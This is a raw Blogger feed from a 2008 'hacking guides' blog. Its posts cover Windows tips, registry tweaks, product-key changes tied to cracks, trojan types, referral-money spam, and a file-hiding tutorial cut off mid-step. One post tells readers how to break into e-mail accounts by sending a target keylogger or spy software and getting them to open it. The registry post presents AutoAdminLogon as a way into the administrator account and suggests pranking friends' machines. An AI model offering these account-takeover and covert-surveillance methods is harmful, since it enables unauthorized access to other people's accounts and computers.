href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=8246812277336457658' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/8246812277336457658'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/8246812277336457658'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/03/12-great-tips-and-tricks-of-web.html' title='12 Great Tips and tricks of Web designing'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-70380029984093399</id><published>2008-03-25T01:47:00.000-07:00</published><updated>2008-03-25T01:50:50.645-07:00</updated><title type='text'>How to obtain new ip</title><content type='html'>1. Click on "Start" in the bottom left hand corner of the screen&lt;br /&gt;2. Click on "Run"&lt;br /&gt;3. Type in "command" or "cmd" and hit "Ok"&lt;br /&gt;&lt;br /&gt;You should now be at an MS-DOS prompt screen.&lt;br /&gt;&lt;br /&gt;4. Type "ipconfig /release" just like that, and hit "Enter"&lt;br /&gt;5. Type "exit" and leave the prompt&lt;br /&gt;6. Right-click on "Network Places" or "My Network Places" on your desktop.&lt;br /&gt;7. Click on "Properties"&lt;br /&gt;&lt;br /&gt;You should now be on a screen with something titled "Local Area Connection".&lt;br /&gt;&lt;br /&gt;8. Right-click on "Local Area Connection" and click "Properties"&lt;br /&gt;&lt;br /&gt;9. Double-click on "Internet Protocol (TCP/IP)" in the list under the "General" tab&lt;br /&gt;&lt;br /&gt;10. Click on "Use the following IP address" under the "General" tab&lt;br /&gt;&lt;br /&gt;11. Create an IP address (put any IP there, like 1.2.3.4; it doesn't matter what you enter, this is only to show you how to change your "IP").&lt;br /&gt;&lt;br /&gt;12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.&lt;br /&gt;&lt;br /&gt;13. Hit the "Ok" button here&lt;br /&gt;&lt;br /&gt;14. Hit the "Ok" button again&lt;br /&gt;&lt;br /&gt;You should now be back at the "Local Area Connection" screen.&lt;br /&gt;&lt;br /&gt;15. Right-click back on "Local Area Connection" and go to Properties again.&lt;br /&gt;&lt;br /&gt;16. Go back to the "TCP/IP" settings&lt;br /&gt;&lt;br /&gt;17. This time, select "Obtain an IP address automatically"&lt;br /&gt;&lt;br /&gt;18. Hit "Ok"&lt;br /&gt;&lt;br /&gt;19. 
Hit "Ok" again&lt;br /&gt;&lt;br /&gt;20. You now have a new IP address&lt;br /&gt;&lt;br /&gt;With a little practice, you can easily get this process down to 15 seconds.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-70380029984093399?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/70380029984093399/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=70380029984093399' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/70380029984093399'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/70380029984093399'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/03/how-to-obtain-new-ip.html' title='How to obtain new ip'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-5641624098787306742</id><published>2008-03-10T03:11:00.001-07:00</published><updated>2008-03-10T03:14:47.803-07:00</updated><title type='text'>Succesful method of breaking in e-mail accounts</title><content type='html'>One of the most successful method is achieved with the used of keyloggers and spy software. There are lots of spyware, logging tools available today such as &lt;strong&gt;007, RemoteSpy, Netvizor, Email Spy, Chat Spy, Spector Pro, eBlaster, Invisible Keylogger,&lt;/strong&gt; to name a few. 
This software will create a self extracting or installation file, you can then run it in the computer for surveillance, or email it to your target. The only question is, how can you convinced the recipient to open it?&lt;br /&gt;&lt;br /&gt;Most hackers does not really hacking passwords by penetrating Yahoo, Hotmail, Gmail, and AOL servers, instead they will go for the easy way - the end user, that's you. It's not what you see on the movies such like "Hackers," "SwordFish," and so on. Too good to be true! &lt;strong&gt;&lt;em&gt;&lt;span style="color:#330033;"&gt;They don't actually hack, but logs every stroke on your keyboard including the passwords you have input.&lt;br /&gt;&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Keep in mind that computer surveillance Programs should be used only if necessary, it was not created to invade someone's privacy. If you are going to use it, be a responsible user.&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-5641624098787306742?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/5641624098787306742/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=5641624098787306742' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/5641624098787306742'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/5641624098787306742'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/03/one-of-most-successful-method-is.html' title='Succesful method of breaking in e-mail 
accounts'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-7774348476329348878</id><published>2008-03-10T03:09:00.000-07:00</published><updated>2008-03-10T03:13:57.559-07:00</updated><title type='text'>Danger of ctrl+c in web</title><content type='html'>Just try this:&lt;br /&gt;&lt;strong&gt;1)&lt;/strong&gt; Copy any text with 'ctrl+c'&lt;br /&gt;&lt;strong&gt;2)&lt;/strong&gt; Click the link:&lt;strong&gt; http://www.sourcecodesworld.com/special/clipboard.asp&lt;br /&gt;&lt;/strong&gt;You will see the text you copied on the screen; it was read by this web page. (Check it out !!)&lt;br /&gt;&lt;br /&gt;Do not keep sensitive data (like passwords, credit card numbers, PINs etc.) in the clipboard while surfing the web. It is extremely easy to extract the text stored in the clipboard to steal your sensitive information.&lt;br /&gt;&lt;br /&gt;Be cautious ...&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#000066;"&gt;To avoid the clipboard hack problem, do the following:&lt;br /&gt;1. In Internet Explorer, go to Tools -&gt; Internet options -&gt; Security&lt;br /&gt;2. Press Custom level.&lt;br /&gt;3. In the security settings, select Disable under 'Allow paste operations via script' and click on 'OK'. 
(Now the contents of your clipboard are safe.)&lt;/span&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-7774348476329348878?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/7774348476329348878/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=7774348476329348878' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/7774348476329348878'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/7774348476329348878'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/03/just-try-this-1-copy-any-text-by-ctrlc.html' title='Danger of ctrl+c in web'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-4692150345653780589</id><published>2008-03-10T02:43:00.000-07:00</published><updated>2008-03-10T02:44:16.257-07:00</updated><title type='text'>Enable Hidden Program Uninstallation !!</title><content type='html'>Enable Hidden Program Uninstallation !!&lt;br /&gt;Add/Remove optional features of Windows XP&lt;br /&gt;&lt;br /&gt;To dramatically expand the list of applications you can remove from Windows XP after installation, navigate to &lt;strong&gt;C:\WINDOWS\inf&lt;/strong&gt; (substituting the correct drive letter for your version of Windows) and open the &lt;strong&gt;sysoc.inf file&lt;/strong&gt;. Under Windows XP Professional Edition RC1, this file will resemble the following by default:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#000066;"&gt;[Version]&lt;br /&gt;Signature = "$Windows NT$"&lt;br /&gt;DriverVer=06/26/2001,5.1.2505.0&lt;br /&gt;&lt;br /&gt;[Components]&lt;br /&gt;NtComponents=ntoc.dll,NtOcSetupProc,,4&lt;br /&gt;WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7&lt;br /&gt;Display=desk.cpl,DisplayOcSetupProc,,7&lt;br /&gt;&lt;br /&gt;Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7&lt;br /&gt;NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7&lt;br /&gt;iis=iis.dll,OcEntry,iis.inf,,7&lt;br /&gt;com=comsetup.dll,OcEntry,comnt5.inf,hide,7&lt;br /&gt;dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7&lt;br /&gt;IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7&lt;br /&gt;TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2&lt;br /&gt;msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6&lt;br /&gt;ims=imsinsnt.dll,OcEntry,ims.inf,,7&lt;br /&gt;fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7&lt;br /&gt;AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7&lt;br /&gt;msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7&lt;br /&gt;msnexplr=ocmsn.dll,OcEntry,msnmsn.inf,,7&lt;br /&gt;smarttgs=ocgen.dll,OcEntry,msnsl.inf,,7&lt;br /&gt;RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7&lt;br /&gt;Games=ocgen.dll,OcEntry,games.inf,,7&lt;br /&gt;AccessUtil=ocgen.dll,OcEntry,accessor.inf,,7&lt;br /&gt;CommApps=ocgen.dll,OcEntry,communic.inf,HIDE,7&lt;br /&gt;MultiM=ocgen.dll,OcEntry,multimed.inf,HIDE,7&lt;br /&gt;AccessOpt=ocgen.dll,OcEntry,optional.inf,HIDE,7&lt;br /&gt;Pinball=ocgen.dll,OcEntry,pinball.inf,HIDE,7&lt;br /&gt;MSWordPad=ocgen.dll,OcEntry,wordpad.inf,HIDE,7&lt;br /&gt;ZoneGames=zoneoc.dll,ZoneSetupProc,igames.inf,,7&lt;br /&gt;&lt;br /&gt;[Global]&lt;br /&gt;WindowTitle=%WindowTitle%&lt;br /&gt;&lt;br /&gt;WindowTitle.StandAlone="*"&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;The entries that include the text hide or HIDE will not show up in Add/Remove 
Windows Components by default. To fix this, do a global search and replace for ,hide and change each instance of this to , (a comma). Then, save the file, relaunch Add/Remove Windows Components, and tweak the installed applications to your heart's content.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-4692150345653780589?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/4692150345653780589/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=4692150345653780589' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/4692150345653780589'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/4692150345653780589'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/03/enable-hidden-program-uninstallation.html' title='Enable Hidden Program Uninstallation !!'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-1844747843167901040</id><published>2008-03-10T02:40:00.001-07:00</published><updated>2008-03-10T02:42:00.977-07:00</updated><title type='text'>Change your cd key</title><content type='html'>You don't need to re-install if you want to try the key out ... just do this:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#006600;"&gt;1. Go to Activate Windows&lt;br /&gt;2. 
Select the Telephone option&lt;br /&gt;3. Click "Change Product Key"&lt;br /&gt;4. Enter xxxxx-xxxxx-xxxxx-xxxxx-xxxxx ( your 25 character product key)&lt;br /&gt;5. Click "Update"&lt;br /&gt;&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;Now log off and log back in again. It should now show 60 days left, minus the number of days it had already counted down.&lt;br /&gt;Note: If your crack de-activated REGWIZC.DLL and LICDLL.DLL, you are going to have to re-register them.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-1844747843167901040?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/1844747843167901040/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=1844747843167901040' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/1844747843167901040'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/1844747843167901040'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/03/change-your-cd-key.html' title='Change your cd key'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-3276209819278556579</id><published>2008-03-10T02:32:00.000-07:00</published><updated>2008-03-10T02:40:41.846-07:00</updated><title type='text'>Registry hacking</title><content type='html'>Registry Hacking&lt;br 
/&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#33cc00;"&gt;Display legal notice on startup&lt;/span&gt;&lt;/strong&gt;:&lt;br /&gt;&lt;br /&gt;Wanna tell your friends about the do's and dont's in your computer when they login in your absence. Well you can do it pretty easily by displaying a legal notice at system start up.&lt;br /&gt;&lt;strong&gt;REGEDIT&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]&lt;br /&gt;"legalnoticecaption"="enter your notice caption"&lt;br /&gt;"legalnoticetext"="enter your legal notice text"&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#33cc00;"&gt;Automatic Administrator Login:&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Well here's the trick which you can use to prove that Windows XP is not at all secure as multi-user operating system. Hacking the system registry from any account having access to system registry puts you in to the administrator account.&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#6600cc;"&gt;REGEDIT 4&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]&lt;br /&gt;"AutoAdminLogon"="1"&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#000099;"&gt;&lt;span style="color:#993399;"&gt;No Shutdown&lt;/span&gt;:&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Wanna play with your friends by removing the shutdown option from start menu in their computer.&lt;br /&gt;Just hack it down !!!&lt;br /&gt;Regedit&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#339999;"&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer&lt;br /&gt;"NoClose"="DWORD:1" &lt;/span&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-3276209819278556579?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' 
href='http://hacking-guides.blogspot.com/feeds/3276209819278556579/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=3276209819278556579' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3276209819278556579'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3276209819278556579'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/03/registry-hacking-display-legal-notice.html' title='Registry hacking'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-2264270104681756770</id><published>2008-02-18T00:14:00.000-08:00</published><updated>2008-02-18T00:16:35.113-08:00</updated><title type='text'>Different kinds of trojans</title><content type='html'>These trojans are the most popular trojans now.&lt;br /&gt;Everyone wants to have such trojan because he&lt;br /&gt;or she want to have access to their victim's hard drive.&lt;br /&gt;The RAT'S (remote access trojans)are very&lt;br /&gt;simple to use.Just make someone run the server&lt;br /&gt;and you get the victim's IP and you have FULL&lt;br /&gt;access to his or her computer.They you can&lt;br /&gt;almost everything it depends of the trojan you use.&lt;br /&gt;But the RAT'S have the common remote access trojan functions like:&lt;br /&gt;keylogger,upload and download function,&lt;br /&gt;make a screen shot and so on.Some people use the&lt;br /&gt;trojans for malicious purposes.&lt;br /&gt;They want just to delete and delete.This is 
lame.&lt;br /&gt;There are many programs out there&lt;br /&gt;that detects the most common trojans,but new trojans are&lt;br /&gt;coming every day and these programs are not the maximum defense.&lt;br /&gt;The trojans do always the same things.&lt;br /&gt;If the trojan restart every time Windows is loaded that&lt;br /&gt;means it put something in the registry&lt;br /&gt;or in win.ini or in other system file so the trojan can restart.&lt;br /&gt;Also the trojans create some file in&lt;br /&gt;the WINDOWS\SYSTEM directory.The file is always looking&lt;br /&gt;to be something that the victim will think&lt;br /&gt;is a normal WINDOWS executable.Most trojans hide&lt;br /&gt;from the Alt+Ctrl+Del menu.This is not&lt;br /&gt;good because there are people who use only this way to see&lt;br /&gt;which process are running.There are programs&lt;br /&gt;that will tell me you exactly the process and the&lt;br /&gt;file from where it comes.Yeah but some trojans&lt;br /&gt;as I told you use fake names and it's a little hard&lt;br /&gt;for some people to understand which process&lt;br /&gt;should they kill.The remote access trojans opens&lt;br /&gt;a port on your computer letting everyone to connect.&lt;br /&gt;Some trojans has options like change the port&lt;br /&gt;and put a password so only the guy that infect you&lt;br /&gt;will be able to use the computer.The change&lt;br /&gt;port option is very good because I'm sure you&lt;br /&gt;don't want your victim to see that port 31337 is open&lt;br /&gt;on their computer.Remote access trojans are&lt;br /&gt;appearing every day and they will continue to appear.&lt;br /&gt;For those that use such trojans: BE CAREFUL&lt;br /&gt;you can infect yourself and they the victim you&lt;br /&gt;wanted to destroy will revenge and you'll be sorry.&lt;br /&gt;---------------------------------------&lt;br /&gt;&lt;strong&gt;Password Sending Trojans&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;The purpose of these trojans is to rip all cached&lt;br 
/&gt;passwords and send them to specified e-mail&lt;br /&gt;without letting the victim about the e-mail.&lt;br /&gt;Most of these trojans don't restart every time Windows&lt;br /&gt;is loaded and most of them use port 25 to&lt;br /&gt;send the e-mail.There are such trojans that e-mail&lt;br /&gt;other information too like ICQ number&lt;br /&gt;computer info and so on.These trojans are dangerous if&lt;br /&gt;you have any passwords cached anywhere on your computer.&lt;br /&gt;----------------------------------------&lt;br /&gt;&lt;strong&gt;Keyloggers&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;These trojans are very simple.The only one thing&lt;br /&gt;they do is to log the keys that the victim is pressing&lt;br /&gt;and then check for passwords in the log file.&lt;br /&gt;In the most cases these trojans restart every&lt;br /&gt;time Windows is loaded.They have options&lt;br /&gt;like online and offline recording.In the online recording&lt;br /&gt;they know that the victim is online and&lt;br /&gt;they record everything.But in the offline recording&lt;br /&gt;everything written after Windows start is&lt;br /&gt;recorded and saved on the victims disk waiting for&lt;br /&gt;to be transferred.&lt;br /&gt;----------------------------------------&lt;br /&gt;&lt;strong&gt;Destructive&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;The only one function of these trojans is to&lt;br /&gt;destroy and delete files.This makes them very simple&lt;br /&gt;and easy to use.They can automatically&lt;br /&gt;delete all your .dll or .ini or .exe files on your computer.&lt;br /&gt;These are very dangerous trojans and once&lt;br /&gt;you're infected be sure if you don't disinfect your&lt;br /&gt;computer information will no longer exist.&lt;br /&gt;-----------------------------------------&lt;br /&gt;&lt;strong&gt;FTP&lt;br /&gt;trojans&lt;/strong&gt;&lt;br /&gt;These trojans open port 21 on your computer&lt;br /&gt;letting EVERYONE that has a FTP client to connect&lt;br /&gt;to your computer without 
password and will full upload and download options.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;These are the most common trojans.They all are dangerous&lt;br /&gt;and you should me careful using them.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-2264270104681756770?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/2264270104681756770/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=2264270104681756770' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/2264270104681756770'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/2264270104681756770'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/02/different-kinds-of-trojans.html' title='Different kinds of trojans'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-3164988185008963469</id><published>2008-02-18T00:12:00.000-08:00</published><updated>2008-02-18T00:13:39.743-08:00</updated><title type='text'>Earn money by sms</title><content type='html'>Hi,&lt;br /&gt;How do you like the &lt;strong&gt;&lt;em&gt;&lt;span style="color:#009900;"&gt;idea of getting paid to receive SMS? 
m-earn promises you just that&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt; !&lt;br /&gt;These messages would only contain offer and discounts based on your own interests. You also get to decide the number of ads you receive and their delivery times!&lt;br /&gt;Check out. &lt;strong&gt;&lt;a href="http://www.m-earn.com:8080/Beta/index.jsp?inviteID=211607"&gt;Here &lt;/a&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;There is no limit to what you can earn by referring your friends and relatives..&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-3164988185008963469?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/3164988185008963469/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=3164988185008963469' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3164988185008963469'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3164988185008963469'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/02/earn-money-by-sms.html' title='Earn money by sms'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-1121101911456614922</id><published>2008-02-18T00:08:00.000-08:00</published><updated>2008-02-18T00:11:54.201-08:00</updated><title type='text'>India's no.1 paying site</title><content 
type='html'>&lt;p&gt;&lt;strong&gt;Moneycosmos.com&lt;/strong&gt; - Affiliate Program India!&lt;br /&gt;Lots of people in the USA, Canada, the UK and other countries earn money just sitting at their PC. Money Cosmos gives us the same opportunity to earn from home, and it is as simple as 1, 2, 3.&lt;br /&gt;&lt;br /&gt;How will you earn money?&lt;br /&gt;In simple words, this is your once-in-a-lifetime opportunity to earn money online. They will pay you up to $1.00 USD (Rs. 45.00 INR) for each user who registers for FREE with their advertiser. Plus, they also pay you a whopping 20% extra for transactions generated by members referred by you!&lt;br /&gt;&lt;br /&gt;Why Money Cosmos?&lt;br /&gt;Money Cosmos is a venture of Karmath Infotech Private Limited ®.&lt;br /&gt;In their own words, there are several plus points that set Money Cosmos apart from other affiliate websites:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#009900;"&gt;• Registration is 100% free! No hidden cost.&lt;br /&gt;• You don't need to earn Rs. 2,000 or 5,000 to get paid; our minimum payout is just Rs. 500.&lt;br /&gt;• You don't need to wait 90 or even 60 days for payments. We pay monthly.&lt;br /&gt;• We don't just say that we pay; we are the only website that has proved that it really pays.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;What are you waiting for? 
&lt;a href="http://www.moneycosmos.com/"&gt;Click here to Join Money Cosmos&lt;/a&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-1121101911456614922?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/1121101911456614922/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=1121101911456614922' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/1121101911456614922'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/1121101911456614922'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/02/moneycosmos.html' title='India&apos;s no.1 paying site'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-8558425893762600961</id><published>2008-01-31T03:52:00.000-08:00</published><updated>2008-01-31T04:03:29.272-08:00</updated><title type='text'>Hide your files in a .jpeg file</title><content type='html'>For this, you will only need to download WinRAR. 
You just need a little knowledge of the Command Prompt and WinRAR installed.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;1.&lt;/strong&gt; Gather all the files you wish to hide in a folder anywhere on your PC &lt;strong&gt;(C:\hidden is RECOMMENDED&lt;/strong&gt;).&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;2.&lt;/strong&gt; Now add those files to a &lt;strong&gt;&lt;span style="color:#006600;"&gt;RAR archive&lt;/span&gt;&lt;/strong&gt; (e.g. secret.rar). This file should also be in the same directory &lt;strong&gt;&lt;span style="color:#000099;"&gt;(C:\hidden).&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;3.&lt;/strong&gt; Now look for a simple &lt;strong&gt;&lt;span style="color:#999900;"&gt;JPEG picture file&lt;/span&gt;&lt;/strong&gt; (e.g. logo.jpg). Copy that file into &lt;em&gt;&lt;strong&gt;C:\hidden&lt;/strong&gt;&lt;/em&gt; as well.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;4.&lt;/strong&gt; Now open the Command Prompt (go to Run and type ‘cmd‘) and make &lt;strong&gt;&lt;span style="color:#003300;"&gt;C:\hidden&lt;/span&gt;&lt;/strong&gt; your working directory (cd C:\hidden).&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;5.&lt;/strong&gt; 